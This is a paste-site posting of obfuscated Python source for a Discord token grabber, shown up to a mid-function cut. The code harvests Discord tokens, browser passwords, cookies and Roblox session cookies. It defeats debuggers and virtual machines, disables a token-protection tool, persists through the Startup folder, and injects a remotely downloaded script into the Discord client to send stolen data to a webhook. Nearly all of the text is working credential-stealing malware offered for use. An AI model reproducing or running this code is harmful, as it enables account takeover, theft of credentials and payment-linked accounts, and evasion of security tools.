Discord Token Grabber - Obfuscated Version.v2


SUBMITTED BY: QuartsIsHere

DATE: April 25, 2022, 1:25 a.m.

UPDATED: June 5, 2022, 12:05 a.m.

FORMAT: Text only

SIZE: 39.9 kB

HITS: 497

  1. import os #line:1
  2. import json #line:2
  3. import httpx #line:3
  4. import winreg #line:4
  5. import ctypes #line:5
  6. import shutil #line:6
  7. import psutil #line:7
  8. import asyncio #line:8
  9. import sqlite3 #line:9
  10. import zipfile #line:10
  11. import threading #line:11
  12. import subprocess #line:12
  13. from sys import argv #line:14
  14. from PIL import ImageGrab #line:15
  15. from random import choice #line:16
  16. from base64 import b64decode #line:17
  17. from tempfile import mkdtemp #line:18
  18. from re import findall ,match #line:19
  19. from Crypto .Cipher import AES #line:20
  20. from win32crypt import CryptUnprotectData #line:21
  21. config ={'updateURL':b64decode (b64decode (b64decode ("WEBHOOK").decode ('utf-8')).decode ('utf-8')).decode ('utf-8'),'protection':"KEY_HERE",'updateBackup':b64decode ("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1JkaW1vL0Rpc2NvcmQtSW5qZWN0aW9uL21hc3Rlci9pbmplY3Rpb24uanM").decode ('utf-8'),'tryv3':True ,'tryv2':True ,'tryv1':True ,'debug':True ,'debugPrograms':["httpdebuggerui","wireshark","fiddler","regedit","cmd","taskmgr","vboxservice","df5serv","processhacker","vboxtray","vmtoolsd","vmwaretray","ida64","ollydbg","pestudio","vmwareuser","vgauthservice","vmacthlp","x96dbg","vmsrvc","x32dbg","vmusrvc","prl_cc","prl_tools","xenservice","qemu-ga","joeboxcontrol","ksdumperclient","ksdumper","joeboxserver"]}#line:74
  22. Victim =os .getlogin ()#line:76
  23. Victim_pc =os .getenv ("COMPUTERNAME")#line:77
  24. ram =str (psutil .virtual_memory ()[0 ]/1024 **3 ).split (".")[0 ]#line:78
  25. disk =str (psutil .disk_usage ('/')[0 ]/1024 **3 ).split (".")[0 ]#line:79
  26. class Functions (object ):#line:82
  27. @staticmethod #line:83
  28. def get_headers (OO0O00O0000OOOO00 :str =None ):#line:84
  29. O0OOOO00OOOO0OOO0 ={"Content-Type":"application/json",}#line:87
  30. if OO0O00O0000OOOO00 :#line:88
  31. O0OOOO00OOOO0OOO0 .update ({"Authorization":OO0O00O0000OOOO00 })#line:89
  32. return O0OOOO00OOOO0OOO0 #line:90
  33. @staticmethod #line:92
  34. def get_master_key (OO00000O0000OO0OO )->str :#line:93
  35. with open (OO00000O0000OO0OO ,"r",encoding ="utf-8")as OO0O00OO00OOOOOO0 :#line:94
  36. O0OO0O0OOOOO0O0OO =OO0O00OO00OOOOOO0 .read ()#line:95
  37. O00O00OOOOOO000OO =json .loads (O0OO0O0OOOOO0O0OO )#line:96
  38. O00OOOO00O0000OOO =b64decode (O00O00OOOOOO000OO ["os_crypt"]["encrypted_key"])#line:98
  39. O00OOOO00O0000OOO =O00OOOO00O0000OOO [5 :]#line:99
  40. O00OOOO00O0000OOO =CryptUnprotectData (O00OOOO00O0000OOO ,None ,None ,None ,0 )[1 ]#line:100
  41. return O00OOOO00O0000OOO #line:101
  42. @staticmethod #line:103
  43. def decrypt_val (O00OOOO00O00O0OOO ,O0O0OOO00OOOO00O0 )->str :#line:104
  44. try :#line:105
  45. O0OOOOOO000OO0O0O =O00OOOO00O00O0OOO [3 :15 ]#line:106
  46. O00O0OOOOO0000O00 =O00OOOO00O00O0OOO [15 :]#line:107
  47. O000OOO000OO0000O =AES .new (O0O0OOO00OOOO00O0 ,AES .MODE_GCM ,O0OOOOOO000OO0O0O )#line:108
  48. OOOOO00O00000O0O0 =O000OOO000OO0000O .decrypt (O00O0OOOOO0000O00 )#line:109
  49. OOOOO00O00000O0O0 =OOOOO00O00000O0O0 [:-16 ].decode ()#line:110
  50. return OOOOO00O00000O0O0 #line:111
  51. except Exception :#line:112
  52. return "Failed to decrypt password"#line:113
  53. @staticmethod #line:115
  54. def fetch_conf (OOOO0OO00O0O0OOOO :str )->str or bool |None :#line:116
  55. return config .get (OOOO0OO00O0O0OOOO )#line:117
  56. class HazardTokenGrabberV2 (Functions ):#line:120
  57. def __init__ (O00O0OOOOOOO0O00O ):#line:121
  58. O00O0OOOOOOO0O00O .webhook =O00O0OOOOOOO0O00O .fetch_conf ('updateURL')#line:122
  59. O00O0OOOOOOO0O00O .discordApi ="https://discord.com/api/v9/users/@me"#line:123
  60. O00O0OOOOOOO0O00O .appdata =os .getenv ("localappdata")#line:124
  61. O00O0OOOOOOO0O00O .roaming =os .getenv ("appdata")#line:125
  62. O00O0OOOOOOO0O00O .chrome =O00O0OOOOOOO0O00O .appdata +"\\Google\\Chrome\\User Data\\"#line:126
  63. O00O0OOOOOOO0O00O .dir =mkdtemp ()#line:127
  64. O00O0OOOOOOO0O00O .startup_loc =O00O0OOOOOOO0O00O .roaming +"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"#line:128
  65. O00O0OOOOOOO0O00O .hook_reg ="api/webhooks"#line:129
  66. O00O0OOOOOOO0O00O .regex =r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"#line:130
  67. O00O0OOOOOOO0O00O .encrypted_regex =r"dQw4w9WgXcQ:[^\"]*"#line:131
  68. O00O0OOOOOOO0O00O .sep =os .sep #line:133
  69. O00O0OOOOOOO0O00O .tokens =[]#line:134
  70. O00O0OOOOOOO0O00O .robloxcookies =[]#line:135
  71. os .makedirs (O00O0OOOOOOO0O00O .dir ,exist_ok =True )#line:137
  72. def try_extract (O00O0O0000O0O00OO ):#line:139
  73. def O00OO00OO0O0O000O (*O00000OOOO0OO000O ,**OO0OOO0OOO000OOOO ):#line:140
  74. try :#line:141
  75. O00O0O0000O0O00OO (*O00000OOOO0OO000O ,**OO0OOO0OOO000OOOO )#line:142
  76. except Exception :#line:143
  77. pass #line:144
  78. return O00OO00OO0O0O000O #line:145
  79. async def checkToken (O0OO00OOO0O000O0O ,O0OO00OOOO0O0OO00 :str )->str :#line:147
  80. try :#line:148
  81. O0O000OOO0O000OO0 =httpx .get (url =O0OO00OOO0O000O0O .discordApi ,headers =O0OO00OOO0O000O0O .get_headers (O0OO00OOOO0O0OO00 ),timeout =5.0 )#line:153
  82. except (httpx ._exceptions .ConnectTimeout ,httpx ._exceptions .TimeoutException ):#line:154
  83. pass #line:155
  84. if O0O000OOO0O000OO0 .status_code ==200 and O0OO00OOOO0O0OO00 not in O0OO00OOO0O000O0O .tokens :#line:156
  85. O0OO00OOO0O000O0O .tokens .append (O0OO00OOOO0O0OO00 )#line:157
  86. async def init (O000O000OO0O000OO ):#line:159
  87. if O000O000OO0O000OO .fetch_conf ('debug')and AntiDebug ().inVM :#line:160
  88. os ._exit (0 )#line:161
  89. await O000O000OO0O000OO .bypassBetterDiscord ()#line:162
  90. await O000O000OO0O000OO .bypassTokenProtector ()#line:163
  91. OO0O0OO0OO00O0O0O =[O000O000OO0O000OO .screenshot ,O000O000OO0O000OO .grab_tokens ,O000O000OO0O000OO .grabRobloxCookie ]#line:164
  92. if O000O000OO0O000OO .fetch_conf ('tryv1'):#line:165
  93. OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .hide )#line:166
  94. if O000O000OO0O000OO .fetch_conf ('tryv3'):#line:168
  95. await O000O000OO0O000OO .killProcesses ()#line:169
  96. if O000O000OO0O000OO .fetch_conf ('tryv2'):#line:171
  97. OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .startup )#line:172
  98. if os .path .exists (O000O000OO0O000OO .chrome +'Default')and os .path .exists (O000O000OO0O000OO .chrome +'Local State'):#line:174
  99. OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .grabPassword )#line:175
  100. OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .grabCookies )#line:176
  101. for OOOOOOOOO0OO0OOOO in OO0O0OO0OO00O0O0O :#line:178
  102. OO0O0O0OO00O0OOO0 =threading .Thread (target =OOOOOOOOO0OO0OOOO ,daemon =True )#line:179
  103. OO0O0O0OO00O0OOO0 .start ()#line:180
  104. for O0O0O0OOOOO0O0O0O in threading .enumerate ():#line:181
  105. try :#line:182
  106. O0O0O0OOOOO0O0O0O .join ()#line:183
  107. except RuntimeError :#line:184
  108. continue #line:185
  109. O000O000OO0O000OO .neatifyTokens ()#line:186
  110. await O000O000OO0O000OO .injector ()#line:187
  111. O000O000OO0O000OO .finish ()#line:188
  112. shutil .rmtree (O000O000OO0O000OO .dir )#line:189
  113. def hide (OOO0OO00OO000000O ):#line:191
  114. ctypes .windll .kernel32 .SetFileAttributesW (argv [0 ],2 )#line:192
  115. def startup (O000O00OO0OOO0OO0 ):#line:194
  116. try :#line:195
  117. shutil .copy2 (argv [0 ],O000O00OO0OOO0OO0 .startup_loc )#line:196
  118. except Exception :#line:197
  119. pass #line:198
  120. async def injector (OO00O0O00OOOOO0O0 ):#line:200
  121. for _O0O00O00OOOOO0O00 in os .listdir (OO00O0O00OOOOO0O0 .appdata ):#line:201
  122. if 'discord'in _O0O00O00OOOOO0O00 .lower ():#line:202
  123. OOOOOOO0000O0O00O =OO00O0O00OOOOO0O0 .appdata +OO00O0O00OOOOO0O0 .sep +_O0O00O00OOOOO0O00 #line:203
  124. OOO0OO000OOO00000 =OOOOOOO0000O0O00O +OO00O0O00OOOOO0O0 .sep #line:204
  125. for __OO00O0000O0OO0000 in os .listdir (os .path .abspath (OOOOOOO0000O0O00O )):#line:205
  126. if match (r'app-(\d*\.\d*)*',__OO00O0000O0OO0000 ):#line:206
  127. OOO0OOO0O0OOO00OO =os .path .abspath (OOO0OO000OOO00000 +__OO00O0000O0OO0000 )#line:207
  128. O0O000OOO00O0O0OO =OOO0OOO0O0OOO00OO +'\\modules\\discord_desktop_core-3\\discord_desktop_core\\'#line:208
  129. if os .path .exists (O0O000OOO00O0O0OO ):#line:209
  130. if OO00O0O00OOOOO0O0 .startup_loc not in argv [0 ]:#line:210
  131. try :#line:211
  132. os .makedirs (O0O000OOO00O0O0OO +'initiation',exist_ok =True )#line:213
  133. except PermissionError :#line:214
  134. pass #line:215
  135. if OO00O0O00OOOOO0O0 .hook_reg in OO00O0O00OOOOO0O0 .webhook :#line:216
  136. O0OO0O000OOO00000 =httpx .get (OO00O0O00OOOOO0O0 .fetch_conf ('updateBackup')).text .replace ("%WEBHOOK%",OO00O0O00OOOOO0O0 .webhook )#line:217
  137. else :#line:218
  138. O0OO0O000OOO00000 =httpx .get (OO00O0O00OOOOO0O0 .fetch_conf ('updateBackup')).text .replace ("%WEBHOOK%",OO00O0O00OOOOO0O0 .webhook ).replace ("%WEBHOOK_KEY%",OO00O0O00OOOOO0O0 .fetch_conf ('protection'))#line:221
  139. try :#line:222
  140. with open (O0O000OOO00O0O0OO +'index.js','w',errors ="ignore")as O00000000O0O00O0O :#line:223
  141. O00000000O0O00O0O .write (O0OO0O000OOO00000 )#line:224
  142. except PermissionError :#line:225
  143. pass #line:226
  144. if OO00O0O00OOOOO0O0 .fetch_conf ('tryv3'):#line:227
  145. os .startfile (OOO0OOO0O0OOO00OO +OO00O0O00OOOOO0O0 .sep +_O0O00O00OOOOO0O00 +'.exe')#line:228
  146. async def killProcesses (O00O0O0000O0O0OOO ):#line:230
  147. O0OO000OOOO000OO0 =O00O0O0000O0O0OOO .fetch_conf ('debugPrograms')#line:231
  148. for OOOOO0O000O0OOOOO in ['discord','discordtokenprotector','discordcanary','discorddevelopment','discordptb']:#line:232
  149. O0OO000OOOO000OO0 .append (OOOOO0O000O0OOOOO )#line:233
  150. for O0000OO0OO000O0O0 in psutil .process_iter ():#line:234
  151. if any (OO00OO000OOOO0O00 in O0000OO0OO000O0O0 .name ().lower ()for OO00OO000OOOO0O00 in O0OO000OOOO000OO0 ):#line:235
  152. try :#line:236
  153. O0000OO0OO000O0O0 .kill ()#line:237
  154. except (psutil .NoSuchProcess ,psutil .AccessDenied ):#line:238
  155. pass #line:239
  156. async def bypassTokenProtector (OO00OOO0OO0OOO00O ):#line:241
  157. O0O0O0OOOOO00O000 =f"{OO00OOO0OO0OOO00O.roaming}\\DiscordTokenProtector\\"#line:243
  158. if not os .path .exists (O0O0O0OOOOO00O000 ):#line:244
  159. return #line:245
  160. O00O000OOO0OOO000 =O0O0O0OOOOO00O000 +"config.json"#line:246
  161. for O0O0O0OO0O0O000O0 in ["DiscordTokenProtector.exe","ProtectionPayload.dll","secure.dat"]:#line:248
  162. try :#line:249
  163. os .remove (O0O0O0OOOOO00O000 +O0O0O0OO0O0O000O0 )#line:250
  164. except FileNotFoundError :#line:251
  165. pass #line:252
  166. if os .path .exists (O00O000OOO0OOO000 ):#line:253
  167. with open (O00O000OOO0OOO000 ,errors ="ignore")as OOO0OO0OOO0000OO0 :#line:254
  168. try :#line:255
  169. OO0O00000O0O00O00 =json .load (OOO0OO0OOO0000OO0 )#line:256
  170. except json .decoder .JSONDecodeError :#line:257
  171. return #line:258
  172. OO0O00000O0O00O00 ['Rdimo_just_shit_on_this_token_protector']="https://github.com/Rdimo"#line:259
  173. OO0O00000O0O00O00 ['auto_start']=False #line:260
  174. OO0O00000O0O00O00 ['auto_start_discord']=False #line:261
  175. OO0O00000O0O00O00 ['integrity']=False #line:262
  176. OO0O00000O0O00O00 ['integrity_allowbetterdiscord']=False #line:263
  177. OO0O00000O0O00O00 ['integrity_checkexecutable']=False #line:264
  178. OO0O00000O0O00O00 ['integrity_checkhash']=False #line:265
  179. OO0O00000O0O00O00 ['integrity_checkmodule']=False #line:266
  180. OO0O00000O0O00O00 ['integrity_checkscripts']=False #line:267
  181. OO0O00000O0O00O00 ['integrity_checkresource']=False #line:268
  182. OO0O00000O0O00O00 ['integrity_redownloadhashes']=False #line:269
  183. OO0O00000O0O00O00 ['iterations_iv']=364 #line:270
  184. OO0O00000O0O00O00 ['iterations_key']=457 #line:271
  185. OO0O00000O0O00O00 ['version']=69420 #line:272
  186. with open (O00O000OOO0OOO000 ,'w')as OOO0OO0OOO0000OO0 :#line:273
  187. json .dump (OO0O00000O0O00O00 ,OOO0OO0OOO0000OO0 ,indent =2 ,sort_keys =True )#line:274
  188. with open (O00O000OOO0OOO000 ,'a')as OOO0OO0OOO0000OO0 :#line:275
  189. OOO0OO0OOO0000OO0 .write ("\n\n//Rdimo just shit on this token protector | https://github.com/Rdimo")#line:276
  190. async def bypassBetterDiscord (O00OO00O0O00O0000 ):#line:278
  191. O00OO000OOO000OO0 =O00OO00O0O00O0000 .roaming +"\\BetterDiscord\\data\\betterdiscord.asar"#line:279
  192. if os .path .exists (O00OO000OOO000OO0 ):#line:280
  193. O0OOO0OOO0OOO0OOO =O00OO00O0O00O0000 .hook_reg #line:281
  194. with open (O00OO000OOO000OO0 ,'r',encoding ="cp437",errors ='ignore')as OOOOOOOOOO000OOO0 :#line:282
  195. O0000O0OO0000O000 =OOOOOOOOOO000OOO0 .read ()#line:283
  196. O0OO00OOOOO0OOOOO =O0000O0OO0000O000 .replace (O0OOO0OOO0OOO0OOO ,'RdimoTheGoat')#line:284
  197. with open (O00OO000OOO000OO0 ,'w',newline ='',encoding ="cp437",errors ='ignore')as OOOOOOOOOO000OOO0 :#line:285
  198. OOOOOOOOOO000OOO0 .write (O0OO00OOOOO0OOOOO )#line:286
  199. def getProductValues (OOO000OOOO00OOOOO ):#line:288
  200. try :#line:289
  201. O0O0O0O0000O00OOO =subprocess .check_output (r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault",creationflags =0x08000000 ).decode ().rstrip ()#line:292
  202. except Exception :#line:293
  203. O0O0O0O0000O00OOO ="N/A (Likely Pirated)"#line:294
  204. try :#line:295
  205. OOO0000000OO000O0 =subprocess .check_output (r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName",creationflags =0x08000000 ).decode ().rstrip ()#line:297
  206. except Exception :#line:298
  207. OOO0000000OO000O0 ="N/A"#line:299
  208. return [OOO0000000OO000O0 ,O0O0O0O0000O00OOO ]#line:300
  209. @try_extract #line:302
  210. def grab_tokens (O0O00O0000OOO00OO ):#line:303
  211. O0O0O000O0OO000O0 ={'Discord':O0O00O0000OOO00OO .roaming +'\\discord\\Local Storage\\leveldb\\','Discord Canary':O0O00O0000OOO00OO .roaming +'\\discordcanary\\Local Storage\\leveldb\\','Lightcord':O0O00O0000OOO00OO .roaming +'\\Lightcord\\Local Storage\\leveldb\\','Discord PTB':O0O00O0000OOO00OO .roaming +'\\discordptb\\Local Storage\\leveldb\\','Opera':O0O00O0000OOO00OO .roaming +'\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\','Opera GX':O0O00O0000OOO00OO .roaming +'\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\','Amigo':O0O00O0000OOO00OO .appdata +'\\Amigo\\User Data\\Local Storage\\leveldb\\','Torch':O0O00O0000OOO00OO .appdata +'\\Torch\\User Data\\Local Storage\\leveldb\\','Kometa':O0O00O0000OOO00OO .appdata +'\\Kometa\\User Data\\Local Storage\\leveldb\\','Orbitum':O0O00O0000OOO00OO .appdata +'\\Orbitum\\User Data\\Local Storage\\leveldb\\','CentBrowser':O0O00O0000OOO00OO .appdata +'\\CentBrowser\\User Data\\Local Storage\\leveldb\\','7Star':O0O00O0000OOO00OO .appdata +'\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\','Sputnik':O0O00O0000OOO00OO .appdata +'\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\','Vivaldi':O0O00O0000OOO00OO .appdata +'\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\','Chrome SxS':O0O00O0000OOO00OO .appdata +'\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\','Chrome':O0O00O0000OOO00OO .chrome +'Default\\Local Storage\\leveldb\\','Epic Privacy Browser':O0O00O0000OOO00OO .appdata +'\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\','Microsoft Edge':O0O00O0000OOO00OO .appdata +'\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\','Uran':O0O00O0000OOO00OO .appdata +'\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\','Yandex':O0O00O0000OOO00OO .appdata +'\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\','Brave':O0O00O0000OOO00OO .appdata +'\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\','Iridium':O0O00O0000OOO00OO .appdata +'\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'}#line:327
  212. for O0OOO0O0000000O0O ,O0000OO0OOOO0OOOO in O0O0O000O0OO000O0 .items ():#line:329
  213. if not os .path .exists (O0000OO0OOOO0OOOO ):#line:330
  214. continue #line:331
  215. O00O0000O0OOOOOOO =O0OOO0O0000000O0O .replace (" ","").lower ()#line:332
  216. if "cord"in O0000OO0OOOO0OOOO :#line:333
  217. if os .path .exists (O0O00O0000OOO00OO .roaming +f'\\{O00O0000O0OOOOOOO}\\Local State'):#line:334
  218. for O00OO00OOOO000OO0 in os .listdir (O0000OO0OOOO0OOOO ):#line:335
  219. if O00OO00OOOO000OO0 [-3 :]not in ["log","ldb"]:#line:336
  220. continue #line:337
  221. for O0OO00O0O0O0OOO00 in [O00O0OOOO000O0000 .strip ()for O00O0OOOO000O0000 in open (f'{O0000OO0OOOO0OOOO}\\{O00OO00OOOO000OO0}',errors ='ignore').readlines ()if O00O0OOOO000O0000 .strip ()]:#line:338
  222. for OOOOOOO00O0OOOO00 in findall (O0O00O0000OOO00OO .encrypted_regex ,O0OO00O0O0O0OOO00 ):#line:339
  223. OOOOOO0OOOOOO0000 =O0O00O0000OOO00OO .decrypt_val (b64decode (OOOOOOO00O0OOOO00 .split ('dQw4w9WgXcQ:')[1 ]),O0O00O0000OOO00OO .get_master_key (O0O00O0000OOO00OO .roaming +f'\\{O00O0000O0OOOOOOO}\\Local State'))#line:340
  224. asyncio .run (O0O00O0000OOO00OO .checkToken (OOOOOO0OOOOOO0000 ))#line:341
  225. else :#line:342
  226. for O00OO00OOOO000OO0 in os .listdir (O0000OO0OOOO0OOOO ):#line:343
  227. if O00OO00OOOO000OO0 [-3 :]not in ["log","ldb"]:#line:344
  228. continue #line:345
  229. for O0OO00O0O0O0OOO00 in [O00O0O0O00OOO00OO .strip ()for O00O0O0O00OOO00OO in open (f'{O0000OO0OOOO0OOOO}\\{O00OO00OOOO000OO0}',errors ='ignore').readlines ()if O00O0O0O00OOO00OO .strip ()]:#line:346
  230. for OOOOOO0OOOOOO0000 in findall (O0O00O0000OOO00OO .regex ,O0OO00O0O0O0OOO00 ):#line:347
  231. asyncio .run (O0O00O0000OOO00OO .checkToken (OOOOOO0OOOOOO0000 ))#line:348
  232. if os .path .exists (O0O00O0000OOO00OO .roaming +"\\Mozilla\\Firefox\\Profiles"):#line:350
  233. for O0000OO0OOOO0OOOO ,_O00OO0O00OOOO0OOO ,OO0O0OOO00OOOO000 in os .walk (O0O00O0000OOO00OO .roaming +"\\Mozilla\\Firefox\\Profiles"):#line:351
  234. for _O000OO0OOO00OO00O in OO0O0OOO00OOOO000 :#line:352
  235. if not _O000OO0OOO00OO00O .endswith ('.sqlite'):#line:353
  236. continue #line:354
  237. for O0OO00O0O0O0OOO00 in [O00O0OO000OO0O0OO .strip ()for O00O0OO000OO0O0OO in open (f'{O0000OO0OOOO0OOOO}\\{_O000OO0OOO00OO00O}',errors ='ignore').readlines ()if O00O0OO000OO0O0OO .strip ()]:#line:355
  238. for OOOOOO0OOOOOO0000 in findall (O0O00O0000OOO00OO .regex ,O0OO00O0O0O0OOO00 ):#line:356
  239. asyncio .run (O0O00O0000OOO00OO .checkToken (OOOOOO0OOOOOO0000 ))#line:357
  240. @try_extract #line:359
  241. def grabPassword (O000OOOOO0OO0OOOO ):#line:360
  242. OOOOOO0000O00O0O0 =O000OOOOO0OO0OOOO .get_master_key (O000OOOOO0OO0OOOO .chrome +'Local State')#line:361
  243. OOO00OOOOO00O00OO =O000OOOOO0OO0OOOO .chrome +'default\\Login Data'#line:362
  244. OOO0OO000OO0OO000 =O000OOOOO0OO0OOOO .dir +O000OOOOO0OO0OOOO .sep +"Loginvault1.db"#line:363
  245. shutil .copy2 (OOO00OOOOO00O00OO ,OOO0OO000OO0OO000 )#line:365
  246. O000OO00O0O0O0OOO =sqlite3 .connect (OOO0OO000OO0OO000 )#line:366
  247. OO0OOO00OO0OOO0OO =O000OO00O0O0O0OOO .cursor ()#line:367
  248. with open (O000OOOOO0OO0OOOO .dir +"\\Google Passwords.txt","w",encoding ="cp437",errors ='ignore')as O00OOO0O000OOOOOO :#line:368
  249. OO0OOO00OO0OOO0OO .execute ("SELECT action_url, username_value, password_value FROM logins")#line:369
  250. for O0O00OO000OO00OOO in OO0OOO00OO0OOO0OO .fetchall ():#line:370
  251. OO00000OO0O0O00O0 =O0O00OO000OO00OOO [0 ]#line:371
  252. O0OO0O0O00OOOO0OO =O0O00OO000OO00OOO [1 ]#line:372
  253. O000O0O0OO0000O0O =O0O00OO000OO00OOO [2 ]#line:373
  254. O0OOOOOOO00000000 =O000OOOOO0OO0OOOO .decrypt_val (O000O0O0OO0000O0O ,OOOOOO0000O00O0O0 )#line:374
  255. if OO00000OO0O0O00O0 !="":#line:375
  256. O00OOO0O000OOOOOO .write (f"Domain: {OO00000OO0O0O00O0}\nUser: {O0OO0O0O00OOOO0OO}\nPass: {O0OOOOOOO00000000}\n\n")#line:376
  257. OO0OOO00OO0OOO0OO .close ()#line:377
  258. O000OO00O0O0O0OOO .close ()#line:378
  259. os .remove (OOO0OO000OO0OO000 )#line:379
  260. @try_extract #line:381
  261. def grabCookies (OO00OOO0O0000O000 ):#line:382
  262. OO00000OOO0OOO0OO =OO00OOO0O0000O000 .get_master_key (OO00OOO0O0000O000 .chrome +'Local State')#line:383
  263. O00O00OOO000O0OOO =OO00OOO0O0000O000 .chrome +'default\\Network\\cookies'#line:384
  264. O0O0O0O000OO0000O =OO00OOO0O0000O000 .dir +OO00OOO0O0000O000 .sep +"Loginvault2.db"#line:385
  265. shutil .copy2 (O00O00OOO000O0OOO ,O0O0O0O000OO0000O )#line:387
  266. O0O000O00O0O0OOO0 =sqlite3 .connect (O0O0O0O000OO0000O )#line:388
  267. OOOO0O000OO00OOO0 =O0O000O00O0O0OOO0 .cursor ()#line:389
  268. with open (OO00OOO0O0000O000 .dir +"\\Google Cookies.txt","w",encoding ="cp437",errors ='ignore')as O000OOO0OO0000O0O :#line:390
  269. OOOO0O000OO00OOO0 .execute ("SELECT host_key, name, encrypted_value from cookies")#line:391
  270. for OOO0OO0O0O000O0O0 in OOOO0O000OO00OOO0 .fetchall ():#line:392
  271. O000O00O000O0OOOO =OOO0OO0O0O000O0O0 [0 ]#line:393
  272. O0OOOOO000O0000O0 =OOO0OO0O0O000O0O0 [1 ]#line:394
  273. O0OOO00O00OOOOO00 =OO00OOO0O0000O000 .decrypt_val (OOO0OO0O0O000O0O0 [2 ],OO00000OOO0OOO0OO )#line:395
  274. if O000O00O000O0OOOO !="":#line:396
  275. O000OOO0OO0000O0O .write (f"Host: {O000O00O000O0OOOO}\nUser: {O0OOOOO000O0000O0}\nCookie: {O0OOO00O00OOOOO00}\n\n")#line:397
  276. if '_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_'in O0OOO00O00OOOOO00 :#line:398
  277. OO00OOO0O0000O000 .robloxcookies .append (O0OOO00O00OOOOO00 )#line:399
  278. OOOO0O000OO00OOO0 .close ()#line:400
  279. O0O000O00O0O0OOO0 .close ()#line:401
  280. os .remove (O0O0O0O000OO0000O )#line:402
  281. def neatifyTokens (O000O0O00OO0O000O ):#line:404
  282. O00O0O0O00OO00OOO =open (O000O0O00OO0O000O .dir +"\\Discord Info.txt","w",encoding ="cp437",errors ='ignore')#line:405
  283. for OOOO0O00OO000O0OO in O000O0O00OO0O000O .tokens :#line:406
  284. OOOO0OOO00000OO0O =httpx .get (O000O0O00OO0O000O .discordApi ,headers =O000O0O00OO0O000O .get_headers (OOOO0O00OO000O0OO )).json ()#line:407
  285. OOO0OO00000O00OO0 =OOOO0OOO00000OO0O .get ('username')+'#'+str (OOOO0OOO00000OO0O .get ("discriminator"))#line:408
  286. O000O0OO0O000OOOO =""#line:410
  287. OO00OOO0OOOOO0O0O =OOOO0OOO00000OO0O ['flags']#line:411
  288. if (OO00OOO0OOOOO0O0O ==1 ):#line:412
  289. O000O0OO0O000OOOO +="Staff, "#line:413
  290. if (OO00OOO0OOOOO0O0O ==2 ):#line:414
  291. O000O0OO0O000OOOO +="Partner, "#line:415
  292. if (OO00OOO0OOOOO0O0O ==4 ):#line:416
  293. O000O0OO0O000OOOO +="Hypesquad Event, "#line:417
  294. if (OO00OOO0OOOOO0O0O ==8 ):#line:418
  295. O000O0OO0O000OOOO +="Green Bughunter, "#line:419
  296. if (OO00OOO0OOOOO0O0O ==64 ):#line:420
  297. O000O0OO0O000OOOO +="Hypesquad Bravery, "#line:421
  298. if (OO00OOO0OOOOO0O0O ==128 ):#line:422
  299. O000O0OO0O000OOOO +="HypeSquad Brillance, "#line:423
  300. if (OO00OOO0OOOOO0O0O ==256 ):#line:424
  301. O000O0OO0O000OOOO +="HypeSquad Balance, "#line:425
  302. if (OO00OOO0OOOOO0O0O ==512 ):#line:426
  303. O000O0OO0O000OOOO +="Early Supporter, "#line:427
  304. if (OO00OOO0OOOOO0O0O ==16384 ):#line:428
  305. O000O0OO0O000OOOO +="Gold BugHunter, "#line:429
  306. if (OO00OOO0OOOOO0O0O ==131072 ):#line:430
  307. O000O0OO0O000OOOO +="Verified Bot Developer, "#line:431
  308. if (O000O0OO0O000OOOO ==""):#line:432
  309. O000O0OO0O000OOOO ="None"#line:433
  310. OO00OOOOOO0O00000 =OOOO0OOO00000OO0O .get ("email")#line:434
  311. O0OO0OO00OOOOO00O =OOOO0OOO00000OO0O .get ("phone")if OOOO0OOO00000OO0O .get ("phone")else "No Phone Number attached"#line:436
  312. OO0OO000OOOOOOO0O =httpx .get (O000O0O00OO0O000O .discordApi +'/billing/subscriptions',headers =O000O0O00OO0O000O .get_headers (OOOO0O00OO000O0OO )).json ()#line:437
  313. OO00OO0OO00000OOO =False #line:438
  314. OO00OO0OO00000OOO =bool (len (OO0OO000OOOOOOO0O )>0 )#line:439
  315. O0OO0OO0O00O0O0OO =bool (len (json .loads (httpx .get (O000O0O00OO0O000O .discordApi +"/billing/payment-sources",headers =O000O0O00OO0O000O .get_headers (OOOO0O00OO000O0OO )).text ))>0 )#line:440
  316. O00O0O0O00OO00OOO .write (f"{' '*17}{OOO0OO00000O00OO0}\n{'-'*50}\nToken: {OOOO0O00OO000O0OO}\nHas Billing: {O0OO0OO0O00O0O0OO}\nNitro: {OO00OO0OO00000OOO}\nBadges: {O000O0OO0O000OOOO}\nEmail: {OO00OOOOOO0O00000}\nPhone: {O0OO0OO00OOOOO00O}\n\n")#line:441
  317. O00O0O0O00OO00OOO .close ()#line:442
  318. def grabRobloxCookie (O0O0OOOOOOO000OO0 ):#line:444
  319. def OO0OO0OOO0OOO0OOO (O0O0OO00O0000O000 ):#line:445
  320. try :#line:446
  321. return subprocess .check_output (fr"powershell Get-ItemPropertyValue -Path {O0O0OO00O0000O000}:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY",creationflags =0x08000000 ).decode ().rstrip ()#line:449
  322. except Exception :#line:450
  323. return None #line:451
  324. OO00000OOOOO000O0 =OO0OO0OOO0OOO0OOO (r'HKLM')#line:452
  325. if not OO00000OOOOO000O0 :#line:453
